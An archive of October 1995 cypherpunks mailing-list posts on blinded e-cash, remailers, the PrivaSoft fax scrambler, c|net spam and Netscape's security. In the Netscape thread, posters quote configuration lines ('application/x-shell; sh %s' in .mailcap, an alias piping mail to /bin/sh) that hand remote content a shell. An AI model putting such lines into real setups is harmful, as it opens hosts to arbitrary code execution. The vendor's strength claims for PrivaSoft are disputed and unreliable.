> Bank --(unblinding)-> payer --(unblinding)-> payee --> payee spends money
> 
> The payee generates some digital coins, blinds them, and sends them to the
> payer.  The payer then makes a withdrawl from his bank account, blinds the
> coins again (or not, it really doesn't matter) and sends them to the bank.

If the payer doesn't add a blinding factor, then the only blinding factor
is the one known to the payee.  The payee could reveal this blinding factor
to the bank, destroying the payer's anonymity.

Right?

> The bank signs them, and returns them to the payer.  The payer removes his
> blinding (if any) and sends them to the payee.  The payee unblinds the
> coins and spends them at his leisure.  Privacy for all involved.

David R. Conrad, conrad@detroit.freenet.org, http://www.grfn.org/~conrad
Hardware & Software Committee  --  Finger conrad@grfn.org for public key
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ROBO Anonymous Remailer / Mail Server <robo@c2.org>
Date: Tue, 24 Oct 95 07:29:52 PDT
To: rops@c2.org
Subject: robo remailer
Message-ID: <Pine.SUN.3.91.951024072246.21183A-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


robo remailer is functional again
sorry for inconveniences
my account is back up

this remailer will not be shut down
anytime in the foreseeable future

my thanks to sameer
for not deleting the account
while it was inactive
and for maintaining
c2.org



--
ROBO Anonymous Remailer / Mail Server <ROBO@c2.org>    PGP Key = 8717D1DD
    PGP Fingerprint: 08 A6 47 EB A2 C6 02 36  35 9A 0E C4 D9 A7 94 4D
   Send mail with subject: HUMAN to have it redirected to the operator
       Mail with subject: HELP will be replied to with a help file






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: privsoft@ix.netcom.com (Steve )
Date: Tue, 24 Oct 95 07:25:39 PDT
To: cypherpunks@toad.com
Subject: Re: Re: Reformated: How secure....
Message-ID: <199510241425.HAA20039@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


    Firstly, I would like to thank Cypherpunks members for helping me 
evaluate and critique my document on PrivaSoft's security. I would like 
to address several of the issues raised on list list. 

    1. Alot of question would be answered if you had a copy of 
PrivaSoft to look at or at least a scrambled page to examine. Both of 
these are available at our WEB site 
(http://www.privasoft.com/privasoft) this is not an advertising plug, 
it really helps to see the thing in action to better understand its 
capabilities. 
    2. Re: the 9 digit key.
        Partially why you misunderstand the strength of the 9 digit key 
in PrivaSoft is b/c Graphical Encryption is very different form data 
encryption. Graphic encryption takes an image of your document and 
scrambles the tiles accross the page in a pseudo-random order based 
both on the encryption algorithm and the key used, Each key produces a 
completely different scramble. Further, descrambling entails moving  
tiles and recognition of readable text. An edge detection machine would 
not be helpful with PrivaSoft, as far as I know, OCR or human 
interface, or the PrivaSoft descrambler( with the correct key) are the 
only methods that can be employed. And all three of these take 
considerable time. Time is a key factor here (no pun intended). the 
strength of an encryption relies heavily on the time it takes to 
bruteforce check different keys. as such, even the addition of 10 
miliseconds to the process is a significant increase in security when 
taken on the large scale of how many keys need to be checked. 

    3. The key extension is useful when documents are scrambled using 
the same default key. This feature adds 2 digits to your key, thus, 
even the same exact document scrambled with the same key but a 
different key extension would produce a radically diofferent scramble. 

    4. With regard to the increased font size, this is not necessary 
but is helpful in that the tiles themselves would contain less 
recognisable features of letters. 

    5. As a fax security product, their is nothing comparable to 
PrivaSoft in ease of use, strength, verstility. I'm sure you have all 
recieved faxes that have come in skewed, with heavy line noise, a black 
line running accros the page, or any other combanaiton of fax problems. 
These do not effect PrivaSoft's capability to descramble the fax, 
PrivaSoft has several patented features that produce readable text even 
after moderate damage to the page. Also, if you haven't figured this 
out yet, PrivaSoft is the only encryption software that provides 
Hardcopy encryption and decryption, ie. you can print out a hardcopy of 
the scrambled image, and fax it, store it, even snail mail it and then 
on the recieving end, fax or scan it back into the pc and decrypt. 

    6. re: custimization:
        This refers to our capability, for corperate clients and the 
like, to produce batch operation or need specific features. Also we can 
increase the digits of the key if the client requires such, as in gov't 
agencies etc, however this is not necesary for day to day use as 
PrivaSoft is strong enough for most transmissions over the Net and via 
fax regardless of the prevalent comments by many members of this group. 
I do not take offence at the many slurs on our product. I fully believe 
that if any of those who believe that PrivaSoft is a fly-by-night or 
bogus product have not looked at or tried the software and therfore 
speak from less than a knowledgable position. Please do not take this 
the wrong way, I do not mean to insult anyones inteligence or ability, 
I just mean to say that many here are quick to judge, and they have a 
right to be suspicious of everything and everyone, that is the nature 
of security, but I do challenge the naysayers to truly check out the 
software before completely condeming its use and capabilities. I have 
personnally demonstrated are software to several key individuals in the 
gov't, military, and corperate arenas both executive and technical 
persons. All were impressed have taken the software back for further 
testing. I have recieved positive responces from them and many have 
recomended / are presently using PrivaSoft.

    Once again, thank you for your help in editing and restructurin g 
the How secure document and i will post an updated version when it is 
ready. Also, if anyone would like a scrambled page E-mailed to them to 
look at / try to crack please E-mail me as such, I do not wish to post 
one only b/c many of you might not want to recieve it. If you have 
further questions or comments, I do appreciate and encourage them, 
please feel free to E-mail me at privsoft@ix.netcom.com or post them 
here.

Steve O.

*************************************************
PrivaSoft TM                                    *
1877 Springfield Ave PO BOX 600                 *
Maplewood NJ 07040-0600                        *
Tel. 201-378-8865  Fax. 201-762-3742            *
Http://www.privasoft.com/privasoft              *
E-mail: privsoft@ix.netcom.com                  *
*************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 24 Oct 95 07:27:12 PDT
To: cypherpunks@toad.com
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
In-Reply-To: <199510240749.RAA07855@sweeney.cs.monash.edu.au>
Message-ID: <199510241425.HAA06922@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Jiri Baum <jirib@sweeney.cs.monash.edu.au> writes:
>Hello Hal <hfinney@shell.portal.com>
>H wrote:
>> There could be an issue of fraud, though,
>> where Bob insists that Alice's coin was no good even though it actually
>> was.

>Cut'n'choose between Alice and Bob? Ie Alice asks Bob for half the blinds
>to check that the proto-coins are true?

This would work to protect Alice from certain kinds of fraud by Bob, but
it increases the amount of data considerably, and it still does not
resolve the main issue that Bob claims that his coin didn't unlind to
clean data.  Who is at fault in that case?  How can this be resolved?

>Apart from no-good proto-coins, is there any other way the coin
>could be no good?

Alice could give Bob bogus data, Bob could give Alice bogus data, Bob
could claim that Alice gave him bogus data (even though it was good).

>As for no-good proto-coins, it's Bob's fault, isn't it? Alice has 
>a record of what Bob sent, and what she sent back. Anybody can check
>that the latter is a bank-signed version of the former.

If what she got from Bob was signed by him, she can prove that she gave him
back a bank-signed version of that.  (He has to sign it, otherwise she
could just exhibit two bogus numbers, one the cube of the other.)  Given
that, your idea seems good.  Alice can prove that she did her part OK, so
if she is able to show such a proof then Bob must be at fault.

>Given this,
>there's no need (from this) for Alice to know that the proto-coins are
>good (if they aren't, Bob's an idiot, but there's not much Alice
>can do about it - I guess given all the blinding factors the bank
>could replace the coin, seeing that it signed a worthless one).

Yes, I think so, so there is no need for the cut and choose.

>An interesting question is whether Bob and Nick can now collude to
>expose Alice. Therefore Alice would at least want to verify that the
>proto-coins are true? Would that suffice? Or is that not necessary?

I don't think they can.  All Bob sees is his own blinded coin, and the
signed version of that.  The bank sees a separately blinded number which
it signed.  Alice's blinding factor can be anything, so there is no
linkage between them.

However, the timing is a problem.  Bob knows _when_ Alice communicated
with the bank.  So he can collude with the bank afterwards to identify
those withdrawals which took place at that time, one of which must have
been Alice.  This could be a problem.

In regular ecash, the timing issue is potentially less serious because
the payee can in principle have a totally anonymous relationship to the
bank, and exchange his received coins for fresh ones.  But in this
system doing that is more difficult.  Alice must withdraw funds rather
than deposit them.  To do so totally anonymously she would have to
present coins to the bank at withdrawal time equal in value to the
amount she wanted to pay Bob.  The bank would replace these coins with
fresh ones that it signs, which are the doubly-blinded ones which Bob
has provided to Alice.  So this is a somewhat more roundabout
approach.  However, if you do this, and Alice communicates with the
bank anonymously, then both sides seem to be pretty well protected
against collusion.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Tue, 24 Oct 95 07:29:50 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <DGxxGM.IHu@sgi.sgi.com>
Message-ID: <199510241429.HAA02508@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DGxxGM.IHu@sgi.sgi.com>, Jiri Baum <jirib@sweeney.cs.monash.edu.au> writes:
> TW writes:

>> I agree.  Sending your cc# to a key or an IP address is not what you
>> want to do.  As a consumer, I want to make sure that I send my cc# to
>> the merchant I am buying from.

> But how do you know that you want to send to Egghead Software in the
> first place? EHS could be a MIMT, maybe you really want to talk to
> Eggfoot Software, but every e-mail Eggfoot sends out is intercepted
> and changed to read "Egghead" (and vice versa)...

> By the time you verify that Egghead is who you want, you could have just
> as easily verified that the key is who you want. Thus skipping one step
> and avoiding all the attacks applicable to that step.

That's true.  You really want to make sure that the merchant you are
giving your money to is the one who has the goods you are interested in.
Perhaps the only way to solve this problem is with some sort of trusted
escrow agency.  The agency would be well known and its reputation could
be verified fairly easily.  Of course there's still the existential
problem of how do you know your connection to the rest of the world
isn't controlled by someone else, but there's really no solution to
that.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rthomas@pamd.cig.mot.com (Robert Owen Thomas)
Date: Tue, 24 Oct 95 05:56:16 PDT
To: "Lynne L. Harrison" <lharrison@mhv.net>
Subject: Re: Verification of Registration
In-Reply-To: <9510241224.AA19261@mhv.net>
Message-ID: <9510240752.ZM12430@pamd.cig.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


hello, Lynne--

i did, as well.  odd.  any clues?

regards,
--robert
--

o  robert owen thomas: unix consultant. cymro ydw i. user scratching post.  o
o       e-mail: Robert.Thomas@pamd.cig.mot.com --or-- robt@cymru.com        o
o               vox:  708.435.7076   fax:  708.435.7360                     o
o        "When I die, I want to go sleeping like my grandfather...          o
o              Not screaming like the passengers in his car."               o




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: privsoft@ix.netcom.com (Steve )
Date: Tue, 24 Oct 95 07:53:55 PDT
To: cypherpunks@toad.com
Subject: encryption products
Message-ID: <199510241453.HAA06552@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


    I am presently evaluating / testing / researching three encryption 
products and I was wondering if any of ya'll are familliar with them. 
1. TECSEC'c VEIL product ( so far only available through mailorder)
2. K. Briggs's Puffer, ( available for demo download off the web)
3. P. Glen's THE CRYPT , ( also available off the web)
 
I am looking for comments about their respective crypto strengths, 
verstility, and capability. Thanks in advance for any assistance.

Steve O

*************************************************
PrivaSoft TM                                    *
1877 Springfield Ave PO BOX 600                 *
 Maplewood NJ 07040-0600                        *
Tel. 201-378-8865  Fax. 201-762-3742            *
Http://www.privasoft.com/privasoft              *
E-mail: privsoft@ix.netcom.com                  *
*************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Tue, 24 Oct 95 07:41:34 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Remailer-in-a-Box, Everyone a Remailer
Message-ID: <199510241458.HAA27765@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain



>Rather, a single physical machine site can and should be able to run many
>remailers, out of user accounts. (Accounts on systems like Sameer's C2. Or
>Hal's remailer running on Portal. Or maybe some of the Mixmaster clients.)

This also brings up the idea of 'opportunistic remailers' again (somebody
gimme a snazzy name for that) - a PC/Mac-based SMTPish server that isn't
always online. Shell accounts are becoming a piece of history for most
users; part-time dialup IP (ppp/slip) is the predominant connectivity layer.
A user could run an opportunistic remailer, and compile a list of other opp
remailers his server would poll in addition to the standard shell-based
'always up' remailers. Given a large enough list (ie, everyone on this list
ran this app in the background) there should be plenty of opp remailers
online and ready to relay at any given time to make this an effective model.
--
   Jay Campbell   Regional Operations Manager
   -=-=-=-=-=-=-  Sense Networking (Santa Cruz Node) 
   edge@got.net   MIT PGP KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Tue, 24 Oct 95 08:04:04 PDT
To: cypherpunks@toad.com
Subject: Re: [reformatted] how secure can privasoft be?
Message-ID: <9510241500.AA07290@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> > > This can at most buy you a constant factor - useful, but not very.
> ...
> > Someone else on this list mentioned that an edge detection algorithm 
> ...
> > It could give you a quick go/no go.
> 
> Don't forget that in most cases it'll be obvious that it's the wrong
> key - only when it isn't would you submit the thing to a second-level
> analyzer to check for edges/characters etc.

I'm confused here.  How will it be obvious?  Unless you mean that you're
going to sit there and watch it while it goes through the, (on average),
999999999/2 keys it would have to try before finding it.  That could
take awhile and really slow things down if it took user intervention
for each test.  You can't beat the human eye on visual discrimination
though.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 24 Oct 95 05:00:32 PDT
To: sjb@universe.digex.net (Scott Brickner)
Subject: Re: Don't Kill the Messenger--A New Slant on Remailers
In-Reply-To: <199510240008.UAA11781@universe.digex.net>
Message-ID: <199510241203.IAA22014@homeport.org>
MIME-Version: 1.0
Content-Type: text


Scott Brickner wrote:

| I had a similar idea that I mentioned to Hal in a private message.  How
| about a POP server that authenticates with crypto, and accepts and
| holds email addressed to the keyid of a PGP key?  You send email to
| 4466A801@keymail.com it holds them for 30 days (or whatever) and
| discards them.  When I connect to the server to retrieve my mail, it
| asks for my public key, encrypts a random challenge with it, and I tell
| it the decrypted version.  Having proved that I can read messages
| encrypted to the key, it delivers messages addressed to the hash of the
| key.  It might also allow me to configure an address where
| notifications of new messages should be sent.

	Who cares if you can read messages encrypted to the key or
not?  Let everyone connect and download whatever messages they want to
see.  They're encrypted, after all.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Tue, 24 Oct 95 05:17:35 PDT
To: sameer@c2.org (sameer)
Subject: Re: Mark Twain Bank (was: Anonymity: A Modest Proposal) (fwd)
In-Reply-To: <199510240222.TAA03524@infinity.c2.org>
Message-ID: <199510241217.IAA06524@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain




> denominated in dollars.) Being a money market fund, a positive return
> is -not- guaranteed, and it is not FDIC insured. It is an "investment"
> account, not a "savings" account. (That is my understanding, which
> could very well be flawed.)

There FAQ indicated FDIC insurance.

/hawk



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 24 Oct 95 08:27:53 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <LAA19345.199510231500@garotte.va.pubnix.com>
Message-ID: <308D04F8.7E0F@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen wrote:
> 
> > In message <9510231413.AA26514@all.net>, Dr. Frederick B. Cohen writes:
> > [...]
> > >I strongly disagree.  If Netscape provided a way to execute shell
> > >commands on your host from a remote computer, it would certainly be a
> > >hole created by their product.  The fact that the default shell is
> > >potentially dangerous means it's incumbant on those who provide access
> > >to it to provide adequate protection.
> >
> > They do, add:
> >
> > application/x-shell; sh %s
> >
> > to your .mailcap.
> >
> > They had better stop supporting mailcap alltogether, after all *any*
> > of the programs in there could have buffer overflows, or other
> > security problems.  I'll bet some of them even do, anyone want to
> > see if sox (a program that transforms sound files from format to
> > format - frequently used to convert .wav files to .au files) has
> > any overruns in the chunk handling code?
> 
> This is where the difference between your view and mine seem to part company.
> I am not talking about some bug in postscript or the shell.  I am talking about
> a program that grants remote access to run these programs in the normal manner,
> which is unsafe.
> 
> To support the position you seem to be taking (and the one currently
> taken by Netscape), you would have to say that the last several Sendmail
> "bugs" were not sendmail problems but rather shell problems because all
> sendmail did was allow you to execute a shell from the remote machine
> (perhaps via a queue file).

  The execution of shell commands by sendmail was not approved
by the user.  The execution of a shell or postscript interpreter, or
whatever, by netscape must be configured by the user.  These are
not the same situation at all.  

> > >If Netscape wants to claim their product doesn't degrade security, they
> > >should provide a safe postscript interpreter or not provide hooks to
> > >unsafe ones.
> >
> > Sure, and they had better find a way to keep us from editing the binary
> > and adding whatever insecure features we may want to their program.
> 
> That's correct.  Secure software has to have secure distribution in
> order to maintain its security when distributed through an untrusted
> channel.  I think that Netscape uses an MD5 checksum which the members
> of this list seem to place unlimited trust in (incorrectly in my view,
> but that would be picking two nits with one keyboard entry).

  I posted a list of MD5 checksums as a personal favor to various cypherpunks
who asked for them, since I have access to the original bits.  The official
Netscape solution for checking your downloaded distribution will be
announced later in the year.  In the mean time anyone who is uncomfortable
with downloading the bits from the net can always buy a copy.  We will
ship them the distribution on floppy.

 Do you have something better than MD5 to suggest?  If so, on what do you base this
opinion?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Tue, 24 Oct 95 05:24:02 PDT
To: cypherpunks@toad.com
Subject: Re: Verification of Registration
Message-ID: <9510241224.AA19261@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


  Curious.  Did anyone else receive this unsolicitated *invitation*?

At 11:31 PM 10/23/95 -0700, verify@cnet.com wrote:
>Your membership registration has been processed.  To become a full member
>of c|net online, please return the text of this message (to verify@cnet.com).
>
>The following magic token in this message [cypherpunks::752400770] will be
automatically
>processed to verify you.  Please note: The number included in the token is
>*not* your password; the one to use on the site is the one you entered on
>the registration form.
>
>Please include the complete token appearing above, including the brackets.
>The best way to return it to us is to include this entire message in your
>reply.  If you mailer does not allow you to do this, retype or cut and
>paste the magic token (including the square brackets) into a new message to
>verify@cnet.com. If you are having difficulty completing this process,
>please direct your questions to support@cnet.com.
>
>Once you are verified you will be able to take advantage of the full
>range of c|net online's services.
>
>

********************************************************************
Lynne L. Harrison, Esq.
Poughkeepsie, New York 
lharrison@mhv.net

"Say not, 'I have found the truth', but rather, 'I have found a truth.'"
                         - Kahlil Gibran from "The Prophet"
********************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Tue, 24 Oct 95 08:50:44 PDT
To: an413572@anon.penet.fi
Subject: Re: Netscape rewards are an insult
Message-ID: <9510241546.AA07304@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> >                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
> WTF?

I'm surprised you didn't get this.  It's a simple phrasal substitution cipher,
sort of like a license plate.  Think of it as this:


      C   SUMO      CLU     NE
      See Sumo      Clue    No (clever putting a foreign word there, eh?
                                But not clever enough to throw us off! )

and realizing that sumo refers to sumo wrestling:

      See wrestling clue    no

and when you realize that a clue tells you about the reality of something:

      See wrestling reality no

or rearranging:

      See wresting no reality

or:

      See, wrestling has no reality!

And you can see that it's a simple assertion that professional wrestling's
not real.  It's wrong of course.  Think about when they pick someone up
and throw them.  If that happened to me it would hurt...don't you think?

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Tue, 24 Oct 95 06:50:39 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <9510240929.AA08313@all.net>
Message-ID: <Pine.SUN.3.90.951024083716.7258A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain




Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Tue, 24 Oct 1995, Dr. Frederick B. Cohen wrote:

> Date: Tue, 24 Oct 1995 05:29:33 -0400 (EDT)
> From: Dr. Frederick B. Cohen <fc@all.net>
> > In message <9510231413.AA26514@all.net>, Dr. Frederick B. Cohen writes:
> > >I strongly disagree.  If Netscape provided a way to execute shell
> > >commands on your host from a remote computer, it would certainly be a
> > >hole created by their product.  The fact that the default shell is
> > >potentially dangerous means it's incumbant on those who provide access
> > >to it to provide adequate protection.
> > 
> > They do, add:
> > 
> > application/x-shell; sh %s
> > 
> > to your .mailcap.
> > 
[..rant removed..]
> To support the position you seem to be taking (and the one currently
> taken by Netscape), you would have to say that the last several Sendmail
> "bugs" were not sendmail problems but rather shell problems because all
> sendmail did was allow you to execute a shell from the remote machine
> (perhaps via a queue file).  You would also apparently say that it's
> secure to allow a server to grant unlimited shell access to unknown,
> unauthenticated remote users.  This seems foolhearty to me.

This is compleate bullshit. Equating bugs on sendmail to adding the above
to your mailcap, is compleately of the wall. Why not try this: compare it to
adding 

	stupidfuck: "|/bin/sh"

Obiously no one in their right mind will put the above on their aliases file.
And please tell me of one MTA does check for this? You want to add to 
sendmail so that it checks for this? Maybe it should also check for
pipes to perl, sed, awk, csh, python, ad nauseum.

Now if you would understand that *people* are supposed to know what to put
into their aliases file, you would understand they need to know what they 
have to put in their mailcap files. There is nothing a program can do 
about it. If you scan for certain interpreters and outlaw them, new ones 
will be created you dont know about.

Your logic is compleatly flawled.

> That's correct.  Secure software has to have secure distribution in
> order to maintain its security when distributed through an untrusted
> channel.  I think that Netscape uses an MD5 checksum which the members
> of this list seem to place unlimited trust in (incorrectly in my view,
> but that would be picking two nits with one keyboard entry).

Question: Does your software (your striped down http server, etc)
do this? I bet not.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Tue, 24 Oct 95 00:50:17 PDT
To: cypherpunks@toad.com
Subject: Hack DigiCash: Payee Anonymity
Message-ID: <199510240750.IAA04175@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Well, Sameer is offering a "Hack DigiCash" promotion, in the same spirit as
the hack Netscape and Microsoft offer.  However, Chaum is a fairly
experienced cryptographer, and I doubt that there are any major security
flaws in the system.  The trial version used RSAREF, so that code at least
was open for your inspection.  There is still the possibility of bugs
creeping in when porting to different platforms tho...

I think the most interesting hack to pursue is to eliminate the
payee-nonanonymity problem.  The current software uses the following
protocol:

The  <--(blinding)--- Client
Bank --(unblinding)-> Client --> Merchant(non-anonymous) --> deposit in bank

The client is anonymous to the bank because of the blinding.  What we want
is for the client to be able to pay someone money, and have the recipient
be able to spend the money anonymously.  That is, there must be blinding
between the payer and the payee:

The  <--(blinding)--- payer <--(blinding)--- payee
Bank --(unblinding)-> payer --(unblinding)-> payee --> payee spends money

The payee generates some digital coins, blinds them, and sends them to the
payer.  The payer then makes a withdrawl from his bank account, blinds the
coins again (or not, it really doesn't matter) and sends them to the bank. 
The bank signs them, and returns them to the payer.  The payer removes his
blinding (if any) and sends them to the payee.  The payee unblinds the
coins and spends them at his leisure.  Privacy for all involved.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian Gorka" <gorkab@sanchez.com>
Date: Tue, 24 Oct 95 06:23:06 PDT
To: cypherpunks@toad.com
Subject: C|Net
Message-ID: <00998577B2607A40.00004156@sanchez.com>
MIME-Version: 1.0
Content-Type: text/plain


Yes, I got it too.  What is it?

>  Curious.  Did anyone else receive this unsolicitated *invitation*?
>
>At 11:31 PM 10/23/95 -0700, verify@cnet.com wrote:
>Your membership registration has been processed.  To become a full member
>of c|net online, please return the text of this message (to verify@cnet.com).
>
----------------crap deleted---------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sharborth@hai-net.com
Date: Tue, 24 Oct 95 05:54:23 PDT
To: lharrison@mhv.net>
Subject: Re[2]: Verification of Registration
Message-ID: <9509248145.AA814550885@houston_cc_smtp.hai-net.com>
MIME-Version: 1.0
Content-Type: text/plain


     Yes
     
     wsh


______________________________ Reply Separator _________________________________
Subject: Re: Verification of Registration
Author:  "Lynne L. Harrison" <lharrison@mhv.net> at internet
Date:    24-10-95 09:03


  Curious.  Did anyone else receive this unsolicitated *invitation*?
     
At 11:31 PM 10/23/95 -0700, verify@cnet.com wrote:
>Your membership registration has been processed.  To become a full member
>of c|net online, please return the text of this message (to verify@cnet.com). 
>
>The following magic token in this message [cypherpunks::752400770] will be 
automatically
>processed to verify you.  Please note: The number included in the token is 
>*not* your password; the one to use on the site is the one you entered on 
>the registration form.
>
>Please include the complete token appearing above, including the brackets. 
>The best way to return it to us is to include this entire message in your 
>reply.  If you mailer does not allow you to do this, retype or cut and 
>paste the magic token (including the square brackets) into a new message to 
>verify@cnet.com. If you are having difficulty completing this process, 
>please direct your questions to support@cnet.com.
>
>Once you are verified you will be able to take advantage of the full 
>range of c|net online's services.
>
>
     
******************************************************************** 
Lynne L. Harrison, Esq.
Poughkeepsie, New York 
lharrison@mhv.net
     
"Say not, 'I have found the truth', but rather, 'I have found a truth.'"
                         - Kahlil Gibran from "The Prophet"
********************************************************************
     
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: postmaster@cnet.com
Date: Tue, 24 Oct 95 09:03:11 PDT
Subject: Welcome to c|net
Message-ID: <199510241603.JAA10729@orpheum.cnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Your verification was successful! You are now a full-fledged member of
c|net online. See you on the Net!

---------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Tue, 24 Oct 95 07:11:16 PDT
To: cypherpunks@toad.com
Subject: Re: Internet Security Review
Message-ID: <199510241410.JAA28216@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



Several people have asked me about Internet Security Review. As far as I
can tell I must have registered for a free copy sometime in the recent
past. I think it was on firewalls that I saw it first mentioned. At any
rate, there is a little fold out thingy in the back with some questions
on it to register for a free copy or pass it on to a friend. This appears
to be the introductory issue.

Here's what it looks like:

_ YES, I want to receive Internet Security Review

   _____________________________________
    (signature is essential)

 Please answer all of the following questions, sign and mail form to:
 Internet Security Review, Postoffice Box 2236, Naples, Florida 33939, USA

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 

01	Name
02	Company/Agency
03	Dept./mail route
04	Mail address
05	City
06	State
07	Zip code
08	Country
09	Is the address above your business address ?	_ Yes	_ No
10	What is your current position ?	_ Corporate executive	_ Management
	_ Supervision	_ Employee	_ Student
	_ Other ________________________________________________
11	Is information security a part of your day to day responsibility ?
	_ Yes	_ No
12	Does your job include the administration and/or maintenance of an
	Internet site ?	_ Yes	_ No
13	Does your job include the supervision of (onre or more ) Internet
	site(s) ?	_ Yes	_ No
14	Does your position include advisory on soft- and hardware/peripheral
	purchases essential for Internet site security ?
	_ Advisory	_ Decisionmaker
15	What is your email address ?
16	Are you using PGP encryption with message interchange, or a different
	encryption program ?
	_ PGP	_ Other, please complete ____________________________________
17	Are you in favor of key escrow?	_ Yes	_ No
18	Is (are) the site(s) within your responsibility using a firewall ? 
	_ Yes	_ No
19	Is (are) the site(s) within your responsibility using special access
	devices (smart cards, tokens, etc.)	_ Yes	_ No
20	From time to time, we will ask your opinion on various aspects of
	Internet security. Are you available to cooperate ? 	_ Yes	_ No
21	What particular topics would you like to see covered in Internet
	Security Review ?
	___________________________________________________________________
	___________________________________________________________________
	___________________________________________________________________



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Tue, 24 Oct 95 09:15:29 PDT
To: (Recipient list suppressed)
Subject: Re: Mark Twain Bank
Message-ID: <v02120d02acb2c5bc4466@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain


>Well just another bit of information. On their FAQ they say to mail to
>shops@marktwain.com for more information on merchant accounts. Well the
>address does not exist. Not a very good start. I hope the get their act
>together.
>

They STILL haven't fixed that? I complained about it to Trotter
on Sunday night. It looks a lot like the marktwain.com doman is run
by SPS Productions, and that MTB doesn't have direct control over
something as simple as adding a mail alias.

FWIW, I have heard some nice things about MTB _as a bank_, but they
not only seem technically clueless, they seem to have made a very
poor choice in outsourcing the technical aspects of this job. They
also appear to have _no clue whatsoever_ about how to market this
service. When three reasonably intelligent people can obtain three
_completely different_ ideas of how the MTB e-cash accounts are set
up, they're in a world of hurt, 'cause most people aren't even going
to take the time.  Aaaargh!

Also, http://marktwain.com is the home page for this SPS Productions
outfit...  these are apparently the ones responsible for the
look of their web page (at first I thought that MTB had interpreted
the request to "fix their web page" as a request to "tart it up",
